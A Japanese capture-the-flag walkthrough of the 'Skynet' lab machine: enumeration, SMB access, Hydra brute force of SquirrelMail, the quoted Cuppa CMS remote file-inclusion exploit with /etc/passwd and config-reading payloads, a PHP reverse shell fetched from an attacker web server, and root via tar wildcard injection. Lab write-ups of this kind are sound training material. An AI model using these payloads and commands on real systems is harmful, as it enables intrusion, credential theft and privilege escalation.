What is Miles password for his emails?
とりあえず、nmap
nmap 10.10.204.224
Starting Nmap 7.60 ( https://nmap.org ) at 2024-07-15 08:52 BST
Nmap scan report for ip-10-10-204-224.eu-west-1.compute.internal (10.10.204.224)
Host is up (0.0026s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
110/tcp open pop3
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
MAC Address: 02:B8:09:9A:1E:73 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 1.76 seconds
httpがオープンなのでブラウザで確認。
skynetのロゴがあり、検索バーもあった。
gobusterで隠れディレクトリを探索。
gobuster dir -u http://10.10.204.224 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.204.224
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2024/07/15 08:57:34 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/admin (Status: 301)
/.htaccess (Status: 403)
/config (Status: 301)
/css (Status: 301)
/index.html (Status: 200)
/js (Status: 301)
/server-status (Status: 403)
/squirrelmail (Status: 301)
===============================================================
2024/07/15 08:57:37 Finished
===============================================================
/adminと/configは403で入れなかった。
/squirrelmailにアクセスすると、SquirrelMail 1.4.23のログイン画面があった。
SquirrelMailのエクスプロイトを検索する。
$ searchsploit squirrelmail
------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------- ---------------------------------
SquirrelMail - 'chpasswd' Local Buffer Overflow | linux/local/273.c
SquirrelMail - 'chpasswd' Local Privilege Escala | linux/local/417.c
SquirrelMail 1.2.11 - 'move_messages.php' Arbitr | php/webapps/22791.txt
SquirrelMail 1.2.11 - Multiple Vulnerabilities | php/webapps/22793.txt
SquirrelMail 1.2.11 Administrator Plugin - 'opti | php/webapps/22792.txt
SquirrelMail 1.2.6/1.2.7 - Multiple Cross-Site S | php/webapps/21811.txt
SquirrelMail 1.2.x - From Email Header HTML Inje | php/webapps/24167.txt
SquirrelMail 1.2.x - Theme Remote Command Execut | php/webapps/21358.sh
SquirrelMail 1.4.2 Address Add Plugin - 'add.php | php/webapps/26305.txt
Squirrelmail 1.4.x - 'Redirect.php' Local File I | php/webapps/27948.txt
SquirrelMail 1.4.x - Folder Name Cross-Site Scri | php/webapps/24068.txt
SquirrelMail 1.x - Email Header HTML Injection | linux/remote/24160.txt
SquirrelMail 3.1 - Change Passwd Plugin Local Bu | linux/local/1449.c
SquirrelMail < 1.4.22 - Remote Code Execution | linux/remote/41910.sh
SquirrelMail < 1.4.5-RC1 - Arbitrary Variable Ov | php/webapps/43830.txt
SquirrelMail < 1.4.7 - Arbitrary Variable Overwr | php/webapps/43839.txt
SquirrelMail G/PGP Encryption Plugin - 'deleteke | php/webapps/4718.rb
SquirrelMail G/PGP Encryption Plugin 2.0 - Comma | php/webapps/4173.txt
SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - A | php/webapps/30859.txt
SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - M | php/webapps/30283.txt
SquirrelMail PGP Plugin - Command Execution (SMT | linux/remote/16888.rb
SquirrelMail Virtual Keyboard Plugin - 'vkeyboar | php/webapps/34814.txt
------------------------------------------------- ---------------------------------
Shellcodes: No Results
この中で、ver 1.4.23 に使えそうなのは以下の5件。
Squirrelmail 1.4.x - 'Redirect.php' Local File I | php/webapps/27948.txt
SquirrelMail 1.4.x - Folder Name Cross-Site Scri | php/webapps/24068.txt
SquirrelMail 1.x - Email Header HTML Injection | linux/remote/24160.txt
SquirrelMail < 1.4.5-RC1 - Arbitrary Variable Ov | php/webapps/43830.txt
SquirrelMail < 1.4.7 - Arbitrary Variable Overwr | php/webapps/43839.txt
しかし、調べた結果うまく使えそうなものはありませんでした。
煮詰まったのでHintをみます。
Enumerate Samba
SMBの調査をしてみます。
$ nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.242.86
Starting Nmap 7.60 ( https://nmap.org ) at 2024-07-16 06:54 BST
Nmap scan report for ip-10-10-242-86.eu-west-1.compute.internal (10.10.242.86)
Host is up (0.00018s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 02:A8:72:B5:28:69 (Unknown)
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.242.86\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (skynet server (Samba, Ubuntu))
| Users: 2
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.242.86\anonymous:
| Type: STYPE_DISKTREE
| Comment: Skynet Anonymous Share
| Users: 0
| Max Users: <unlimited>
| Path: C:\srv\samba
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.242.86\milesdyson:
| Type: STYPE_DISKTREE
| Comment: Miles Dyson Personal Share
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\milesdyson\share
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.242.86\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
| smb-enum-users:
| SKYNET\milesdyson (RID: 1000)
| Full name:
| Description:
|_ Flags: Normal user account
Nmap done: 1 IP address (1 host up) scanned in 1.60 seconds
anonymaousにアクセスする。
$ smbclient //10.10.242.86/anonymous
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Nov 26 16:04:00 2020
.. D 0 Tue Sep 17 08:20:17 2019
attention.txt N 163 Wed Sep 18 04:04:59 2019
logs D 0 Wed Sep 18 05:42:16 2019
9204224 blocks of size 1024. 5831500 blocks available
logsの下にはlog1.txt、log2.txt、log3.txtがあった。
log2.txt、log3.txtは中に何も書いておらず、log1.txtとattention.txtは以下の通りだった。
$ cat log1.txt
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator
$ cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
attention.txtより、log1.txtはパスワードリストだということが分かった。
問題ではmilesのパスワードを聞いているのでブルートフォースでこのリストからパスワードを探し当てる。
$ hydra -l milesdyson -P log1.txt 10.10.242.86 http-form-post "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect."
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2024-07-16 07:13:03
[DATA] max 16 tasks per 1 server, overall 16 tasks, 31 login tries (l:1/p:31), ~2 tries per task
[DATA] attacking http-post-form://10.10.242.86:80//squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect.
[80][http-post-form] host: 10.10.242.86 login: milesdyson password: cyborg007haloterminator
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2024-07-16 07:13:14
cyborg007haloterminator
What is the hidden directory?
ユーザー名とパスワードがわかったので、squirrelmailにログインしてみる。
探索すると、メールに以下の内容が書いてあった。
We have changed your smb password after system malfunction.
Password: )s{A&2Z=F^n_E.B`
このパスワードを使って、SMBにもう一度アクセスする。
$ smbclient //10.10.242.86/milesdyson --user=milesdyson
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\milesdyson's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Sep 17 10:05:47 2019
.. D 0 Wed Sep 18 04:51:03 2019
Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 10:05:14 2019
Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 10:05:14 2019
Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 10:05:14 2019
notes D 0 Tue Sep 17 10:18:40 2019
Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 10:05:14 2019
Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 10:05:14 2019
9204224 blocks of size 1024. 5831392 blocks available
たくさんのpdfと一つのフォルダがある。
順番に見ていくと、notesの中にimportant.txtがあった。
$ cat important.txt
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
3に大切なことが書いてますね。
それはさておき、/45kra24zxs28v3ydが隠しディレクトリなんじゃないかな。
アクセスするとヒットした。
/45kra24zxs28v3yd
What is the vulnerability called when you can include a remote file for malicious purposes?
Miles Dyson Personal Page
Dr. Miles Bennett Dyson was the original inventor of the neural-net processor which would lead to the development of Skynet,
a computer A.I. intended to control electronically linked weapons and defend the United States.
Miles Dysonはスカイネットの開発者だったんですね。
これ以上めぼしい情報はなかったので、隠しディレクトリを探してみる。
$ gobuster dir -u http://10.10.242.86/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.242.86/45kra24zxs28v3yd/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2024/07/16 07:32:58 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/administrator (Status: 301)
/index.html (Status: 200)
===============================================================
2024/07/16 07:32:58 Finished
===============================================================
/administratorにアクセスしてみると、cuppa cmsのログインページが出てきた。
今度こそ、エクスプロイトの出番じゃないか?!
$ searchsploit cuppa
------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------- ---------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote | php/webapps/25971.txt
------------------------------------------------- ---------------------------------
Shellcodes: No Results
一個しかなかった。見てみる。
$ searchsploit -m 25971.txt
Exploit: Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion
URL: https://www.exploit-db.com/exploits/25971
Path: /opt/exploitdb/exploits/php/webapps/25971.txt
Codes: OSVDB-94101
Verified: True
File Type: C++ source, ASCII text, with very long lines
Copied to: /root/25971.txt
$ cat 25971.txt
# Exploit Title : Cuppa CMS File Inclusion
# Date : 4 June 2013
# Exploit Author : CWH Underground
# Site : www.2600.in.th
# Vendor Homepage : http://www.cuppacms.com/
# Software Link : http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zip
# Version : Beta
# Tested on : Window and Linux
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
####################################
VULNERABILITY: PHP CODE INJECTION
####################################
/alerts/alertConfigField.php (LINE: 22)
-----------------------------------------------------------------------------
LINE 22:
<?php include($_REQUEST["urlConfig"]); ?>
-----------------------------------------------------------------------------
#####################################################
DESCRIPTION
#####################################################
An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.
http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]
#####################################################
EXPLOIT
#####################################################
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
Moreover, We could access Configuration.php source code via PHPStream
For Example:
-----------------------------------------------------------------------------
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
-----------------------------------------------------------------------------
Base64 Encode Output:
-----------------------------------------------------------------------------
PD9waHAgCgljbGFzcyBDb25maWd1cmF0aW9uewoJCXB1YmxpYyAkaG9zdCA9ICJsb2NhbGhvc3QiOwoJCXB1YmxpYyAkZGIgPSAiY3VwcGEiOwoJCXB1YmxpYyAkdXNlciA9ICJyb290IjsKCQlwdWJsaWMgJHBhc3N3b3JkID0gIkRiQGRtaW4iOwoJCXB1YmxpYyAkdGFibGVfcHJlZml4ID0gImN1XyI7CgkJcHVibGljICRhZG1pbmlzdHJhdG9yX3RlbXBsYXRlID0gImRlZmF1bHQiOwoJCXB1YmxpYyAkbGlzdF9saW1pdCA9IDI1OwoJCXB1YmxpYyAkdG9rZW4gPSAiT0JxSVBxbEZXZjNYIjsKCQlwdWJsaWMgJGFsbG93ZWRfZXh0ZW5zaW9ucyA9ICIqLmJtcDsgKi5jc3Y7ICouZG9jOyAqLmdpZjsgKi5pY287ICouanBnOyAqLmpwZWc7ICoub2RnOyAqLm9kcDsgKi5vZHM7ICoub2R0OyAqLnBkZjsgKi5wbmc7ICoucHB0OyAqLnN3ZjsgKi50eHQ7ICoueGNmOyAqLnhsczsgKi5kb2N4OyAqLnhsc3giOwoJCXB1YmxpYyAkdXBsb2FkX2RlZmF1bHRfcGF0aCA9ICJtZWRpYS91cGxvYWRzRmlsZXMiOwoJCXB1YmxpYyAkbWF4aW11bV9maWxlX3NpemUgPSAiNTI0Mjg4MCI7CgkJcHVibGljICRzZWN1cmVfbG9naW4gPSAwOwoJCXB1YmxpYyAkc2VjdXJlX2xvZ2luX3ZhbHVlID0gIiI7CgkJcHVibGljICRzZWN1cmVfbG9naW5fcmVkaXJlY3QgPSAiIjsKCX0gCj8+
-----------------------------------------------------------------------------
Base64 Decode Output:
-----------------------------------------------------------------------------
<?php
class Configuration{
public $host = "localhost";
public $db = "cuppa";
public $user = "root";
public $password = "Db@dmin";
public $table_prefix = "cu_";
public $administrator_template = "default";
public $list_limit = 25;
public $token = "OBqIPqlFWf3X";
public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
public $upload_default_path = "media/uploadsFiles";
public $maximum_file_size = "5242880";
public $secure_login = 0;
public $secure_login_value = "";
public $secure_login_redirect = "";
}
?>
-----------------------------------------------------------------------------
Able to read sensitive information via File Inclusion (PHP Stream)
################################################################################################################
Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################
脆弱性はremote file inclusionだった。
remote file inclusion
What is the user flag?
脆弱性を利用してリバースシェルを取得する。
$ wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
php-reverse-shellを取得する。
リバースシェルジェネレータで攻撃元のIPとポートを指定して作成してもよい。
php-reverse-shell.phpはIPを攻撃元ローカルIPに、ポートを任意のものに指定する。
php-reverse-shell.phpが保存してあるディレクトリで、webサーバーを立てる。
$ python3 -m http.server 80
攻撃元でリッスンする。
$ nc -lvnp 5555
ブラウザで以下のリンクにアクセスする。
http://10.10.51.86/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.92.184/php-reverse-shell.php
リバースシェルをゲットした。
user.txtがあった。
What is the root flag?
sudo -l は使えそうになかった。
crontabを確認する。
$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/1 * * * * root /home/milesdyson/backups/backup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
backup.shをみると、 /var/www/html/以下をバックアップしている。
ワイルドカードが使われていた。
$ cat backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
ワイルドカードを使用している場合、–checkpoint=1や --checkpoint-action=exec=sh shell.sh などの名前のファイルをオプションとして扱ってしまうらしい。
参考:
$ touch "--checkpoint=1"
$ touch "--checkpoint-action=exec=sh shell.sh"
shell.shも作成して、/rootフォルダの権限を編集するコマンドを書き込む。
$ chmod 777 shell.sh
一分後にrootフォルダが見られるようになる。
root.txtがあった。